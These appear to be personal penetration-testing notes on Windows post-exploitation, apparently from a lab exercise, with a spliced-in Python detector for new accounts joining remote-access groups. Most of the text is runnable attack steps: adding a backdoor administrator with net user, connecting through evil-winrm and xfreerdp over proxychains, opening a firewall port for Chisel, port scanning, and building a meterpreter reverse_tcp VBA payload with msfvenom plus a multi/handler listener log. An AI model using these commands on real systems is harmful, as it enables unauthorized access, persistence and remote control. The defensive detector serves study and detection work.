Windows - Stabilisation & Post Exploitation
Create an RDP and WinRM user
With an account that has the correct privileges, we should be able to obtain either a GUI through RDP (port 3389) or a stable CLI shell through WinRM (port 5985).
Specifically, we need a user account (as opposed to the service account we're currently using) that is a member of the "Remote Desktop Users" group for RDP, or the "Remote Management Users" group for WinRM. A user in the "Administrators" group does not need the RDP group, and the original Administrator account can access either at will.
net user sarp password /add
net localgroup Administrators sarp /add
net localgroup "Remote Management Users" sarp /add
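As an added example that is not part of these notes, here is the correlation a defender would run over Security log events to spot exactly the pattern above: a freshly created local account (event 4720) being added to Administrators, Remote Desktop Users or Remote Management Users (event 4732). The event IDs and well-known group SIDs are real; the event records are constructed sample data with simplified field names.

```python
# Added example (not from the original notes): correlate Security events
# 4720 (account created) and 4732 (member added to a local group) to flag
# a new account being granted remote access. Sample events are constructed.
from collections import defaultdict

# Well-known SIDs of the built-in groups discussed in the notes.
REMOTE_ACCESS_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
    "S-1-5-32-580": "Remote Management Users",
}

# Constructed sample events (field names are simplified event data fields).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "sarp", "TargetSid": "S-1-5-21-1-2-3-1105",
     "SubjectUserName": "svc_web", "TimeCreated": "2024-01-01T10:00:00"},
    {"EventID": 4732, "MemberSid": "S-1-5-21-1-2-3-1105", "TargetSid": "S-1-5-32-544",
     "SubjectUserName": "svc_web", "TimeCreated": "2024-01-01T10:00:05"},
    {"EventID": 4732, "MemberSid": "S-1-5-21-1-2-3-1105", "TargetSid": "S-1-5-32-580",
     "SubjectUserName": "svc_web", "TimeCreated": "2024-01-01T10:00:07"},
    {"EventID": 4720, "TargetUserName": "alice", "TargetSid": "S-1-5-21-1-2-3-1106",
     "SubjectUserName": "helpdesk", "TimeCreated": "2024-01-01T11:00:00"},
    # S-1-5-32-545 is the plain "Users" group: benign, must not be flagged.
    {"EventID": 4732, "MemberSid": "S-1-5-21-1-2-3-1106", "TargetSid": "S-1-5-32-545",
     "SubjectUserName": "helpdesk", "TimeCreated": "2024-01-01T11:00:03"},
]

def find_new_remote_accounts(events):
    """One finding per newly created account later added to a group that
    grants RDP/WinRM/admin access. Matching is on SID, so renames don't hide it."""
    created = {}                  # new account SID -> its 4720 event
    granted = defaultdict(list)   # new account SID -> remote-access groups joined
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] == 4732 and ev["MemberSid"] in created:
            group = REMOTE_ACCESS_GROUPS.get(ev["TargetSid"])
            if group:
                granted[ev["MemberSid"]].append(group)
    return [
        {"account": created[sid]["TargetUserName"],
         "created_by": created[sid]["SubjectUserName"],
         "groups": groups}
        for sid, groups in granted.items()
    ]

if __name__ == "__main__":
    for finding in find_new_remote_accounts(SAMPLE_EVENTS):
        print(finding)
```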
WinRM
Let's access the box over WinRM. For this we'll be using a handy little tool called evil-winrm.
This does not come installed by default on Kali, so use the following command to install it from the Ruby Gem package manager:
sudo gem install evil-winrm
With evil-winrm installed, we can connect to the target with the syntax shown here:
evil-winrm -u USERNAME -p PASSWORD -i TARGET_IP
evil-winrm -u sarp -p password -i 10.200.96.150
proxychains evil-winrm -u sarp -p password -i 10.200.96.150
Note that evil-winrm usually gives a medium-integrity shell for added administrator accounts (UAC filters the token of local administrator accounts that connect over the network). Even if your new account has Administrator permissions, you won't actually be able to perform administrative actions with it via WinRM.
RDP Connection
There are many RDP clients available for Linux. One of the most versatile is xfreerdp, which is what we will be using here. If it is not already installed, you can install xfreerdp with the command:
sudo apt install freerdp2-x11
As mentioned, xfreerdp is an incredibly versatile tool with a vast number of options available. These range from routing audio and USB connections into the target, through to pass-the-hash attacks over RDP. The most basic syntax for connecting is as follows:
xfreerdp /v:IP /u:USERNAME /p:PASSWORD
For example:
xfreerdp /v:172.16.0.5 /u:user /p:'password123!'
Note that, as this is a command-line tool, passwords containing shell special characters must be enclosed in quotes.
When authentication has successfully taken place, a new window will open giving GUI access to the target.
xfreerdp can also share the clipboard (+clipboard), resize the session with the window (/dynamic-resolution) and map a local directory into the session as a network drive (/drive). A useful directory to share is /usr/share/windows-resources on Kali, which holds most of the Windows tools stockpiled on Kali, including Mimikatz, which we will be using next. This makes the full command:
xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
xfreerdp /v:10.200.96.150 /u:sarp /p:'password' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
Windows
To allow inbound connections on a port through the Windows firewall (here TCP 47000):
netsh advfirewall firewall add rule name="Chisel-sarp" dir=in action=allow protocol=tcp localport=47000
To import a PowerShell script (.ps1) and use the functions it defines:
Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 172.16.0.10 -TopPorts 50
Invoke-Portscan -hosts "192.168.1.0/24" -oA stuff
type .\alltest.gnmap | findstr Open
This prints one line per host that has open ports, for example:
Host: 192.168.1.1 Open Ports: 443,53,22,5000
Create a .VBA payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.76.120 LPORT=5151 -f vba
Listen for the Meterpreter shell with the multi/handler:
user@AttackBox$ msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.50.159.15
LHOST => 10.50.159.15
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.50.159.15:443